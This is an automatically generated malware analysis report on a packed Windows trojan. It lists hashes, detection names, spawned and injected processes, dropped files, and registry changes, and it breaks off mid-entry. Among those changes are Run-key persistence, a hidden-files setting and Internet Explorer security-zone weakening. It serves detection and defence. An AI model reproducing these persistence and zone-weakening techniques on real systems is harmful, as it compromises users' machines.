HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.79781 (B) (Emsisoft), Gen:Variant.Zusy.79781 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9f63e8b517f9578effb8adbf78bb3dce
SHA1: a60551d80de28799af96aefbc0138bf5abab21f5
SHA256: b934f1c369ae0c65a941476eb56f298ad51aec25832016914b09ddb599d4f418
SSDeep: 6144:sFG/GtASLSFJPOVmbPbn6r/Lu0gh9RGDeAMzRBMDdjg:sUG8JmKD6r/dgTUeAwRBMDdk
Size: 282112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-01-15 11:06:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764
The Trojan injects its code into the following process(es):
Ptype.exe:752
Ptype.exe:1144
bfgsetup_s1_l1.exe:552
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128
File activity
The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
The process WScript.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (0 bytes)
The process CrashHandler.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (0 bytes)
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
The process Ptype.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
The process Ptype.exe:1144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
The process bfgsetup_s1_l1.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp (0 bytes)
The process bfgsetup_s1_l1.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp (0 bytes)
The process %original file name%.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
Registry activity
The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 0B 8D 03 68 B4 5A 0A AE 26 A5 56 81 81 7A 40"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Ptype.exe" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"CrashHandler.exe" = "CrashHandler"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process WScript.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C0 6E 7E 02 D2 21 AC E0 D6 9B AA FB CF 56 A6"
The process CrashHandler.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 3E A5 03 6E 9C F1 6A 40 42 98 F6 6C 81 5F E6"
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 87 A9 4C FA FE 23 FC 8B BE 42 FA 8B 98 B8 5D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process Ptype.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 02 38 01 4D 04 26 FC 42 0B F9 FA 6B F3 6D 6F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process Ptype.exe:1144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 93 6A A4 54 01 E5 34 0B 88 7E C7 D6 AF 63 58"
The process bfgsetup_s1_l1.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 B7 99 DE 09 47 4E 44 8E C3 B5 4C 45 06 17 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process bfgsetup_s1_l1.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 47 02 8C 53 40 9E BD 07 14 38 15 C0 8D 1F C6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Big Fish Games]
"Default" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 98 2B BC FF 43 3F 2E 76 B7 A1 AD 47 6F 25 D5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE" = "prueba1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process reg.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 55 2A E5 B8 82 E4 E2 DF 10 A6 29 1B 61 AF 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"
The process reg.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 87 9B B9 04 C7 59 AE 02 09 58 B2 F1 5C 3F B6"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 5F 52 FA FF 04 8F DD BF D5 E3 FE D2 28 C2 53"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 28 1C 81 18 BD 50 36 49 FD A9 BF 9A 0D 0B A4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A B6 5F 42 F8 CE 0F 6D 9A 58 AC 7E B0 C2 27 35"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 44 E8 05 43 57 53 92 02 CA 03 5D 58 78 86 9E"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 77 27 A5 2F F3 C4 27 2E B3 5C 66 03 B9 7A 3F"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 ED B5 B6 90 D1 5D AE B3 58 25 25 F1 64 68 27"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 8B E6 D1 78 1B 00 F2 41 1F 91 04 8F 05 25 21"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 BA 54 4F C9 49 A0 2A D9 3A AF 71 DC 56 B3 2D"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A C4 76 4F 0B 40 11 5E 7C 64 00 63 A0 71 DF D4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB D4 B0 6F B1 46 B9 14 99 CE 94 F3 95 84 E6 4C"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
The process reg.exe:468 makes changes in the system registry.
